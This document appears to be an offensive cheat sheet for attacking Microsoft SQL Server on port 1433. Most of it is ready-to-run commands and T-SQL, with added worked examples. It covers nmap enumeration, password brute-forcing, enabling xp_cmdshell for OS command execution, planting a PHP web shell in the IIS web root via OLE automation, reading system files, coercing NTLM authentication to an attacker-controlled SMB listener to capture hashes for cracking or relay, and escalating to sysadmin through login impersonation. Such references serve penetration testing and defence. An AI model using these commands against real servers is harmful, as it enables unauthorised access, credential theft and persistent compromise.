# MSSQL - 1433

### Scanning

```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 192.168.1.3
```

### Connection

```bash
# GUI
navicat

# Manual. -windows-auth uses Windows authentication for the given account;
# drop it to authenticate as a SQL login such as sa.
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
```

### Basic Information

Retrieves general information about the MSSQL server (product version, instance name, named-pipe and TCP settings) through the TDS pre-login handshake, so it needs no credentials.

```bash
nmap --script ms-sql-info -p 1433 192.168.1.3
```

Retrieves the NTLM information the server discloses during an NTLM challenge (target name, NetBIOS and DNS domain and computer names, OS version), again without valid credentials.

```bash
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 192.168.1.3
```

### Brute Force

Runs a password-guessing attack against the MSSQL server, trying every combination from the given username and password lists. Note that SQL logins created with CHECK_POLICY enabled inherit the Windows account-lockout policy, so a large password list can lock the accounts you are attacking.

```bash
nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 192.168.1.3
```

Checks the server for logins with an empty password (sa by default).

```bash
nmap -p 1433 --script ms-sql-empty-password 192.168.1.3
```

### Command Execution

xp_cmdshell is disabled by default and enabling it requires sysadmin (or ALTER SETTINGS). Commands run as the SQL Server service account, or as the proxy account configured with sp_xp_cmdshell_proxy_account for non-sysadmin callers.

```bash
# Connect, then run the T-SQL below at the SQL> prompt
impacket-mssqlclient Administrator:Pass123@192.168.50.18 -windows-auth

# xp_cmdshell is an advanced option, so it can only be changed once those are visible
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';
```
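As an added example (not from the original notes): the same enable step, written to record the prior state of both settings, run a command with its output captured into a table, and restore the settings afterwards so the server is left as it was found. It assumes a sysadmin login, and it must be sent as a single batch (sqlcmd -i, a GUI client, or pasted as one line): impacket-mssqlclient sends each input line as its own batch, so the DECLAREd variables would not survive from one line to the next.

```sql
-- Added example, not part of the original notes. Assumes the current login is sysadmin.
-- Record the current state of both settings so they can be restored afterwards.
DECLARE @adv_was INT, @cmd_was INT;
SELECT @adv_was = CAST(value_in_use AS INT) FROM sys.configurations WHERE name = 'show advanced options';
SELECT @cmd_was = CAST(value_in_use AS INT) FROM sys.configurations WHERE name = 'xp_cmdshell';

IF @cmd_was = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- Capture the output in a table instead of relying on the client to render it.
-- The command runs as the SQL Server service account (or the xp_cmdshell proxy account).
DECLARE @out TABLE (line NVARCHAR(MAX));
INSERT INTO @out EXEC master.dbo.xp_cmdshell 'whoami /priv';
SELECT line FROM @out WHERE line IS NOT NULL;

-- Put the settings back exactly as they were found.
IF @cmd_was = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
END;
IF @adv_was = 0
BEGIN
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;
```

Capturing into a table also lets you filter or store the output (for example keep only lines containing "SeImpersonatePrivilege") rather than scrolling through the client's rendering.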

### Create File

Writes a file through OLE automation (sp_OACreate / sp_OAMethod), which is disabled by default and needs sysadmin to enable. The file is created by the SQL Server service account, so that account must be able to write to the target directory.

```sql
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
-- OpenTextFile(path, iomode, create): 8 = ForAppending, 1 = create the file if it does not exist
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OAMethod @FileID, 'Close'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
GO
```

### Read File

Reads a file from the server's filesystem. OPENROWSET(BULK ...) requires the ADMINISTER BULK OPERATIONS server permission (held by sysadmin and bulkadmin), and the file is opened by the SQL Server service account, not by your login.

```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
GO
```

### NTLM Hash Capture (forced authentication)

Each of these procedures makes the server open a UNC path, so the SQL Server service account authenticates to the attacker's SMB listener and Responder captures its Net-NTLMv2 response, which can then be cracked or relayed. Start the listener before running the query; 192.168.1.2 is the attacker host here. The account that answers is the one listed in sys.dm_server_services (service_account column). xp_dirtree and xp_fileexist are executable by any login by default, whereas xp_subdirs needs higher privileges.

```bash
# On the attacker host, start the listener first (tun0 = the interface facing the target)
responder -I tun0
```

```sql
-- Any one of these is enough to trigger the authentication
EXEC master..xp_subdirs '\\192.168.1.2\share\'
exec master.dbo.xp_dirtree '\\192.168.1.2\shares\deneme'
EXEC master..xp_fileexist '\\192.168.1.2\shares\deneme'
```

### Impersonate

Lists the logins the current login has been granted IMPERSONATE on, then switches to one of them. If any of them is sysadmin (sa here), the session is effectively sysadmin after EXECUTE AS; REVERT returns to the original login. GO is the sqlcmd/SSMS batch separator and can be left out in impacket-mssqlclient, which sends each line as its own batch.

```sql
-- The grantor of IMPERSONATE on a login is normally recorded as that login itself,
-- which is why joining on grantor_principal_id returns the impersonable logins
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO

EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
```
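An added example (not from the original notes) with the more precise form of the enumeration query: for class 101 (server principal) rows, major_id is the login that may be impersonated and grantee_principal_id is the login holding the right, so the query shows both sides and flags which targets are sysadmin. It then switches, verifies, and reverts. 'sa' is a placeholder for whichever login the query returns; without VIEW ANY DEFINITION you only see permission rows that involve your own login, which is exactly the attacker's view.

```sql
-- Added example, not part of the original notes. Run as the low-privileged login you hold.
-- class 101 = server principal: major_id is the impersonated login, grantee_principal_id the holder.
SELECT target.name AS can_impersonate,
       holder.name AS held_by,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS sp
JOIN sys.server_principals AS target ON sp.major_id = target.principal_id
JOIN sys.server_principals AS holder ON sp.grantee_principal_id = holder.principal_id
WHERE sp.class = 101
  AND sp.permission_name = 'IMPERSONATE'
  AND sp.state IN ('G', 'W')        -- GRANT / GRANT WITH GRANT OPTION; 'D' rows are denies
ORDER BY target_is_sysadmin DESC;

-- Switch, verify, act, and come back. 'sa' is a placeholder for a login the query returned.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
-- ... anything that needs sysadmin goes here, e.g. enabling xp_cmdshell ...
REVERT;
SELECT SYSTEM_USER AS back_to;
```

The same pattern exists one level down: sys.database_permissions lists IMPERSONATE on database users, and EXECUTE AS USER = 'dbo' inside a database that is marked TRUSTWORTHY and owned by sa yields sysadmin-equivalent rights; that path is not shown here.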
